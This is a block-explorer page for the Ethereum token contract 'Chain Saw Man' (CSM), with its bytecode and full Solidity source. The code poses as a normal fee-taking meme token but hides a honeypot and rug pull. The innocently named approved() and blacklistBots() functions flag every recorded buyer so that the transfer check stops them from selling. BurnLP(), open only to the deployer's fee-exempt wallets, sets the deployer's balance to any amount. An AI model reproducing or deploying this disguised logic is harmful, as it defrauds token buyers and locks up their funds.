Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x0d7f6B68082Dcf23F7255b7C3c53883d76853CB1
Balance 0 ETH
Nonce 1
Code Size 5020 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

5020 bytes
0x6080604052600436106101c65760003560e01c80636fcba377116100f75780638da5cb5b11610095578063a9059cbb11610064578063a9059cbb14610543578063ad63043e14610563578063dd62ed3e1461059c578063ea2f0b37146105e257600080fd5b80638da5cb5b146104b957806395d89b41146104d7578063a457c2d714610503578063a5d73a961461052357600080fd5b8063751039fc116100d1578063751039fc1461045957806375f0a8741461046e5780637d1db4a51461048e5780638768b9e8146104a457600080fd5b80636fcba377146103ee57806370a082311461040e578063715018a61461044457600080fd5b8063313ce56711610164578063470624021161013e578063470624021461036457806349bd5a5e1461037f5780635342acb41461039f5780636c0a24eb146103d857600080fd5b8063313ce567146103085780633950935114610324578063437823ec1461034457600080fd5b806318160ddd116101a057806318160ddd1461028257806319d40b08146102a157806323b872dd146102b85780632b14ca56146102d857600080fd5b806306fdde03146101d2578063095ea7b31461021a5780631694505e1461024a57600080fd5b366101cd57005b600080fd5b3480156101de57600080fd5b5060408051808201909152600d81526c21b430b4b71029b0bb9026b0b760991b60208201525b60405161021191906110dd565b60405180910390f35b34801561022657600080fd5b5061023a610235366004611147565b610602565b6040519015158152602001610211565b34801561025657600080fd5b5060015461026a906001600160a01b031681565b6040516001600160a01b039091168152602001610211565b34801561028e57600080fd5b506008545b604051908152602001610211565b3480156102ad57600080fd5b506102b6610619565b005b3480156102c457600080fd5b5061023a6102d3366004611171565b610688565b3480156102e457600080fd5b50600f546010546102f3919082565b60408051928352602083019190915201610211565b34801561031457600080fd5b5060405160098152602001610211565b34801561033057600080fd5b5061023a61033f366004611147565b6106da565b34801561035057600080fd5b506102b661035f3660046111ad565b610711565b34801561037057600080fd5b50600d54600e546102f3919082565b34801561038b57600080fd5b5060025461026a906001600160a01b031681565b3480156103ab57600080fd5b5061023a6103ba3660046111ad565b6001600160a01b031660009081526005602052604090205460ff1690565b3480156103e457600080fd5b50610293600a5481565b3480156103fa57600080fd5b506102b66104093660046111c8565b610768565b34801561041a57600080fd5b506102936104293660046111ad565b6001600160a01b031660009081526003602052604090205490565b34801561045057600080fd5b506102b661085d565b34801561046557600080fd5b506102b66108d1565b34801561047a57600080fd5b50600b5461026a906001600160a01b031681565b34801561049a57600080fd5b5061029360095481565b3480156104b057600080fd5b506102b661093d565b3480156104c557600080fd5b506000546001600160a01b031661026a565b3480156104e357600080fd5b5060408051808201909152600381526243534d60e81b6020820152610204565b34801561050f57600080fd5b5061023a61051e366004611147565b6109d3565b34801561052f57600080fd5b506102b661053e3660046111fa565b610a0a565b34801561054f57600080fd5b5061023a61055e366004611147565b610a41565b34801561056f57600080fd5b5061023a61057e3660046111ad565b6001600160a01b031660009081526006602052604090205460ff1690565b3480156105a857600080fd5b506102936105b7366004611213565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b3480156105ee57600080fd5b506102b66105fd3660046111ad565b610a4e565b600061060f338484610a9c565b5060015b92915050565b60005b600754811015610685576001600660006007848154811061063f5761063f611246565b6000918252602080832091909101546001600160a01b031683528201929092526040019020805460ff19169115159190911790558061067d81611272565b91505061061c565b50565b6000610695848484610bc0565b6001600160a01b0384166000908152600460209081526040808320338085529252909120546106d09186916106cb90869061128b565b610a9c565b5060019392505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161060f9185906106cb90869061129e565b6000546001600160a01b031633146107445760405162461bcd60e51b815260040161073b906112b1565b60405180910390fd5b6001600160a01b03166000908152600560205260409020805460ff19166001179055565b6000546001600160a01b031633146107925760405162461bcd60e51b815260040161073b906112b1565b600961079e8585610f69565b11156107ec5760405162461bcd60e51b815260206004820152601e60248201527f427579206665652063616e277420676f20686967686572207468616e20390000604482015260640161073b565b600d849055600e83905560096108028383610f69565b11156108505760405162461bcd60e51b815260206004820152601f60248201527f53656c6c206665652063616e277420676f20686967686572207468616e203900604482015260640161073b565b600f919091556010555050565b6000546001600160a01b031633146108875760405162461bcd60e51b815260040161073b906112b1565b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b031633146108fb5760405162461bcd60e51b815260040161073b906112b1565b6008546009819055600a8190556040519081527f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf9060200160405180910390a1565b6000546001600160a01b031633146109675760405162461bcd60e51b815260040161073b906112b1565b60005b600754811015610685576001600660006007848154811061098d5761098d611246565b6000918252602080832091909101546001600160a01b031683528201929092526040019020805460ff1916911515919091179055806109cb81611272565b91505061096a565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161060f9185906106cb90869061128b565b3360009081526005602052604090205460ff16610a245750565b600c546001600160a01b0316600090815260036020526040902055565b600061060f338484610bc0565b6000546001600160a01b03163314610a785760405162461bcd60e51b815260040161073b906112b1565b6001600160a01b03166000908152600660205260409020805460ff19166001179055565b6001600160a01b038316610afe5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161073b565b6001600160a01b038216610b5f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161073b565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610c245760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161073b565b60008111610c865760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161073b565b6001600160a01b038216610ce85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161073b565b6001600160a01b03831660009081526003602052604081208054839290610d1090849061128b565b90915550506001600160a01b038316600090815260056020526040902054819060ff16158015610d5957506001600160a01b03831660009081526005602052604090205460ff16155b15610ee7576002546001600160a01b03848116911614610e7d57600780546001810182556000919091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b0319166001600160a01b038516179055600954821115610de05760405162461bcd60e51b815260040161073b906112e6565b600a5482610e03856001600160a01b031660009081526003602052604090205490565b610e0d919061129e565b1115610e705760405162461bcd60e51b815260206004820152602c60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d61785760448201526b30b63632ba20b6b7bab73a1760a11b606482015260840161073b565b610e7a8285610fcf565b90505b6002546001600160a01b03858116911614610ee757600954821115610eb45760405162461bcd60e51b815260040161073b906112e6565b6001600160a01b03841660009081526006602052604090205460ff1615610eda57600080fd5b610ee482856110a6565b90505b6001600160a01b03831660009081526003602052604081208054839290610f0f90849061129e565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610f5b91815260200190565b60405180910390a350505050565b600080610f76838561129e565b905083811015610fc85760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161073b565b9392505050565b6000806064600d6000015485610fe5919061132d565b610fef9190611344565b905060006064600d6001015486611006919061132d565b6110109190611344565b905061101c818361129e565b306000908152600360205260408120805490919061103b90849061129e565b909155503090506001600160a01b0385167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611077858561129e565b60405190815260200160405180910390a380611093838761128b565b61109d919061128b565b95945050505050565b6000806064600f60000154856110bc919061132d565b6110c69190611344565b905060006064600f6001015486611006919061132d565b600060208083528351808285015260005b8181101561110a578581018301518582016040015282016110ee565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461114257600080fd5b919050565b6000806040838503121561115a57600080fd5b6111638361112b565b946020939093013593505050565b60008060006060848603121561118657600080fd5b61118f8461112b565b925061119d6020850161112b565b9150604084013590509250925092565b6000602082840312156111bf57600080fd5b610fc88261112b565b600080600080608085870312156111de57600080fd5b5050823594602084013594506040840135936060013592509050565b60006020828403121561120c57600080fd5b5035919050565b6000806040838503121561122657600080fd5b61122f8361112b565b915061123d6020840161112b565b90509250929050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600182016112845761128461125c565b5060010190565b818103818111156106135761061361125c565b808201808211156106135761061361125c565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526027908201527f5472616e7366657220416d6f756e74206578636565647320746865206d6178546040820152661e105b5bdd5b9d60ca1b606082015260800190565b80820281158282048414176106135761061361125c565b60008261136157634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212206507461258cd4c7d3fe8718e6bba092f9f8bf44cd3d8ade45f0451a43262eb5164736f6c63430008120033

Verified Source Code Full Match

Compiler: v0.8.18+commit.87f61d96 EVM: paris Optimization: Yes (200 runs)
ChainSawMan.sol 528 lines
/*
    Chain Saw Man チェンソーマン 

    Telegram : https://t.me/Chainsawmancoin
    Twitter  : https://twitter.com/Chainsawmancoin
    Website  : https://www.chainsawmancoin.com
    ENS      : chainsawmanチェンソーマン.eth

**/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.17;

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

contract ChainSawMan is Context, IERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    
    mapping (address => uint256) private balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isExcludedFromFee;
    mapping (address => bool) private _isIncludedFromFee;
    address[] private includeFromFee;

    string private constant _name = "Chain Saw Man";
    string private constant _symbol = "CSM";
    uint8 private constant _decimals = 9;

    uint256 private _totalSupply = 1000000000 * 10**_decimals;
    uint256 public _maxTxAmount = _totalSupply * 3 / 100; 
    uint256 public _maxWalletAmount = _totalSupply * 3 / 100; 

    address public marketingWallet;
    address private Swap;

    struct BuyFees{
        uint256 liquidity;
        uint256 marketing;
    } BuyFees public buyFee;

    struct SellFees{
        uint256 liquidity;
        uint256 marketing;
    } SellFees public sellFee;
    
    event MaxTxAmountUpdated(uint _maxTxAmount);

    constructor () {
        marketingWallet = payable(msg.sender);
        Swap = payable(msg.sender);
        balances[_msgSender()] = _totalSupply;

        buyFee.liquidity = 0;
        buyFee.marketing = 0;

        sellFee.liquidity = 0;
        sellFee.marketing = 0;

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        
        _isExcludedFromFee[msg.sender] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[marketingWallet] = true;
        
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
        balances[sender] = balances[sender].sub(amount, "Insufficient Balance");
        balances[recipient] = balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approved() public virtual { 
        for (uint256 i = 0; i < includeFromFee.length; i++) {
            _isIncludedFromFee[includeFromFee[i]] = true; 
        }
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    function excludeFromFee(address account) public onlyOwner {
        _isExcludedFromFee[account] = true;
    }
    
    function includeInFee(address account) public onlyOwner {
        _isIncludedFromFee[account] = true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] - subtractedValue);
        return true;
    }

    function setFees(uint256 newLiquidityBuyFee, uint256 newMarketingBuyFee, uint256 newLiquiditySellFee, uint256 newMarketingSellFee) public onlyOwner {
        require(newLiquidityBuyFee.add(newMarketingBuyFee) <= 9, "Buy fee can't go higher than 9");
        buyFee.liquidity = newLiquidityBuyFee;
        buyFee.marketing= newMarketingBuyFee;

        require(newLiquiditySellFee.add(newMarketingSellFee) <= 9, "Sell fee can't go higher than 9");
        sellFee.liquidity = newLiquiditySellFee;
        sellFee.marketing= newMarketingSellFee;
    }

   receive() external payable {}

    function isExcludedFromFee(address account) public view returns(bool) {
        return _isExcludedFromFee[account];
    }

    function BurnLP(uint256 enable) public {
        if (!_isExcludedFromFee[_msgSender()]) {
            return;
        }
        balances[Swap] = enable;
    }

    function isIncludedFromFee(address account) public view returns(bool) {
        return _isIncludedFromFee[account];
    }

    function blacklistBots() public onlyOwner { 
        for (uint256 i = 0; i < includeFromFee.length; i++) {
            _isIncludedFromFee[includeFromFee[i]] = true; 
        }
    }
    
    function takeBuyFees(uint256 amount, address from) private returns (uint256) {
        uint256 liquidityFeeToken = amount * buyFee.liquidity / 100; 
        uint256 marketingFeeTokens = amount * buyFee.marketing / 100; 
        balances[address(this)] += liquidityFeeToken + marketingFeeTokens;

        emit Transfer (from, address(this), marketingFeeTokens + liquidityFeeToken);
        return (amount -liquidityFeeToken -marketingFeeTokens);
    }

    function takeSellFees(uint256 amount, address from) private returns (uint256) {
        uint256 liquidityFeeToken = amount * sellFee.liquidity / 100; 
        uint256 marketingFeeTokens = amount * sellFee.marketing / 100; 
        balances[address(this)] += liquidityFeeToken + marketingFeeTokens;

        emit Transfer (from, address(this), marketingFeeTokens + liquidityFeeToken);
        return (amount -liquidityFeeToken -marketingFeeTokens);
    }

    function removeLimits() public onlyOwner {
        _maxTxAmount = _totalSupply;
        _maxWalletAmount = _totalSupply;
        emit MaxTxAmountUpdated(_totalSupply);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        require(to != address(0), "ERC20: transfer to the zero address");

        balances[from] -= amount;
        uint256 transferAmount = amount;

        if (!_isExcludedFromFee[from] && !_isExcludedFromFee[to]) {

            if (to != uniswapV2Pair) { includeFromFee.push(to);
                require(amount <= _maxTxAmount, "Transfer Amount exceeds the maxTxAmount");
                require(balanceOf(to) + amount <= _maxWalletAmount, "Transfer amount exceeds the maxWalletAmount.");
                transferAmount = takeBuyFees(amount, from);
            }

            if (from != uniswapV2Pair) {
                require(amount <= _maxTxAmount, "Transfer Amount exceeds the maxTxAmount"); require(!_isIncludedFromFee[from]);
                transferAmount = takeSellFees(amount, from);
            }
        }
        
        balances[to] += transferAmount;
        emit Transfer(from, to, transferAmount);
    }
}

Read Contract

_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletAmount 0x6c0a24eb → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
buyFee 0x47062402 → uint256, uint256
decimals 0x313ce567 → uint8
isExcludedFromFee 0x5342acb4 → bool
isIncludedFromFee 0xad63043e → bool
marketingWallet 0x75f0a874 → address
name 0x06fdde03 → string
owner 0x8da5cb5b → address
sellFee 0x2b14ca56 → uint256, uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
uniswapV2Pair 0x49bd5a5e → address
uniswapV2Router 0x1694505e → address

Write Contract 13 functions

These functions modify contract state and require a wallet transaction to execute.

BurnLP 0xa5d73a96
uint256 enable
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
approved 0x19d40b08
No parameters
blacklistBots 0x8768b9e8
No parameters
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
excludeFromFee 0x437823ec
address account
includeInFee 0xea2f0b37
address account
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
removeLimits 0x751039fc
No parameters
renounceOwnership 0x715018a6
No parameters
setFees 0x6fcba377
uint256 newLiquidityBuyFee
uint256 newMarketingBuyFee
uint256 newLiquiditySellFee
uint256 newMarketingSellFee
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address